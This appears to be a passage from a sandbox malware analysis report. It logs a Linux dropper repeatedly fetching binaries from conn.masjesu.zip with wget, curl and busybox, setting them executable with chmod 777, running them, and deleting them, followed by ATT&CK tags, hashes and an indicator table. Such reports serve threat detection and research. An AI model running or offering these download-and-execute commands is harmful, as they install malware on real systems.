  - Executes dropped EXE
  PID:979
- /bin/rm
  rm OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  PID:980
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - System Network Configuration Discovery
  PID:981
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:982
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - System Network Configuration Discovery
  PID:984
- /bin/chmod
  chmod 777 DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - File and Directory Permissions Modification
  PID:985
- /tmp/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  ./DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - Executes dropped EXE
  PID:986
- /bin/rm
  rm DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  PID:987
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - System Network Configuration Discovery
  PID:988
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:989
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - System Network Configuration Discovery
  PID:991
- /bin/chmod
  chmod 777 lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - File and Directory Permissions Modification
  PID:992
- /tmp/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  ./lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - Executes dropped EXE
  PID:993
- /bin/rm
  rm lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  PID:994
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - System Network Configuration Discovery
  PID:995
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:996
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - System Network Configuration Discovery
  PID:998
- /bin/chmod
  chmod 777 YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - File and Directory Permissions Modification
  PID:999
- /tmp/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  ./YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - Executes dropped EXE
  PID:1000
- /bin/rm
  rm YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  PID:1001
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - System Network Configuration Discovery
  PID:1002
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1003
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  PID:1005
- /bin/chmod
  chmod 777 WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - File and Directory Permissions Modification
  PID:1006
- /tmp/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  ./WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - Executes dropped EXE
  PID:1007
- /bin/rm
  rm WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  PID:1008
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - System Network Configuration Discovery
  PID:1009
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1010
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  PID:1012
- /bin/chmod
  chmod 777 4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - File and Directory Permissions Modification
  PID:1013
- /tmp/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  ./4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - Executes dropped EXE
  PID:1014
- /bin/rm
  rm 4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  PID:1015
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - System Network Configuration Discovery
  PID:1016
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1017
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - System Network Configuration Discovery
  PID:1019
- /bin/chmod
  chmod 777 QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - File and Directory Permissions Modification
  PID:1020
- /tmp/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  ./QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - Executes dropped EXE
  PID:1021
- /bin/rm
  rm QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  PID:1022

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS	750	dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
/tmp/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv	758	rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
/tmp/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno	765	cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
/tmp/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh	786	OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
/tmp/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE	826	DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
/tmp/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT	834	lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
/tmp/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF	841	YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
/tmp/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY	864	qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
/tmp/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl	885	4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
/tmp/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r	895	QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
/tmp/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU	902	WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
/tmp/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg	909	AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
/tmp/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo	916	QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
/tmp/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n	923	GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
/tmp/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n	930	GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
/tmp/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg	937	AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
/tmp/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo	944	QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
/tmp/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno	951	cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
/tmp/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS	958	dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
/tmp/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv	965	rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
/tmp/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY	972	qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
/tmp/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh	979	OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
/tmp/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE	986	DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
/tmp/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT	993	lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
/tmp/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF	1000	YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
/tmp/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU	1007	WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
/tmp/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl	1014	4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
/tmp/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r	1021	QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r